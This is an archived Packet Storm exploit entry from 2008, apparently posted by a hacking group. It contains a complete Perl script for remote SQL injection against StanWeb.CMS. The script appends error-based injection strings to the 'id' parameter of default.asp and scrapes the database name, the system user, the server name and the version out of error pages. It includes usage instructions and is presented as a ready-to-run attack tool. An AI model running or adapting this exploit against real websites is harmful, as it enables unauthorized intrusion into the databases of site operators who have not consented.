stanwebcms-sql.txt

2008-05-19T00:00:00
ID PACKETSTORM:66467
Type packetstorm
Reporter JosS
Modified 2008-05-19T00:00:00

Description

                                        
                                            `# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--  
# --==+ StanWeb.CMS (default.asp id) Remote SQL Injection Exploit +==--  
# --==+====================================================================================+==--  
# [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]  
  
# [+] Info:  
  
# [~] Software: StanWeb.CMS  
# [~] Exploit: Remote SQL Injection [High]  
# [~] Bug Found By: JosS  
# [~] Contact: sys-project[at]hotmail.com  
# [~] Web: http://www.spanish-hackers.com  
# [~] Vuln File: default.asp  
  
# [+] Exploit:  
  
#!/usr/bin/perl  
  
# StanWeb.CMS (default.asp id) Remote SQL Injection Exploit  
# Code by JosS  
# Contact: sys-project[at]hotmail.com  
# Spanish Hackers Team / EspSeC  
# www.spanish-hackers.com  
  
# in memory of rgod :D  
  
use IO::Socket::INET;  
use LWP::UserAgent;  
use HTTP::Request;  
use LWP::Simple;  
  
sub lw  
{  
  
my $SO = $^O;  
my $linux = "";  
if (index(lc($SO),"win")!=-1){  
$linux="0";  
}else{  
$linux="1";  
}  
if($linux){  
system("clear");  
}  
else{  
system("cls");  
system ("title StanWeb.CMS (default.asp id) Remote SQL Injection Exploit");  
system ("color 02");  
}  
  
}  
  
#*************************** expl ******************************  
  
  
&lw;  
  
print "\t\t########################################################\n\n";  
print "\t\t# StanWeb.CMS - Remote SQL Injection Exploit #\n\n";  
print "\t\t# by JosS #\n\n";  
print "\t\t########################################################\n\n";  
  
  
$host=$ARGV[0];  
chop $host;  
$host=$host."/default.asp?id=";  
  
if(!$ARGV[0]) {  
print "\n[x] StanWeb.CMS - Remote SQL Injection Exploit\n";  
print "[x] written by JosS - sys-project[at]hotmail.com\n";  
print "[x] usage: perl $0 [host]\n";  
print "[x] example: http://hostxx.com/web\n";  
exit(1);  
}  
  
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');  
  
  
for ($i=0;$i<=3;$i++)  
  
{  
  
my $final = $host.$comando[$i];  
my $ua = LWP::UserAgent->new;  
my $req = HTTP::Request->new(GET => $final);  
$doc = $ua->request($req)->as_string;  
  
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )  
{  
  
if ($comando[$i] eq "1+and+1=convert(int,db_name())")  
{  
  
print "db_name:\n";  
  
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);  
print "$dbname\n\n";  
  
}  
  
if ($comando[$i] eq "1+and+1=convert(int,system_user)")  
  
{  
  
print "system_user:\n";  
  
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);  
print "$systemuser\n\n";  
  
}  
  
if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")  
  
{  
  
print "servername:\n";  
  
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);  
print "$servername\n\n";  
  
}  
  
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')  
  
{  
  
print "version:\n";  
  
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);  
print "$version\n\n";  
  
}  
  
} # Cierre del if principal  
} # cierre for  
  
  
# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--  
# --==+ JosS +==--  
# --==+====================================================================================+==--  
# [+] [The End]  
  
`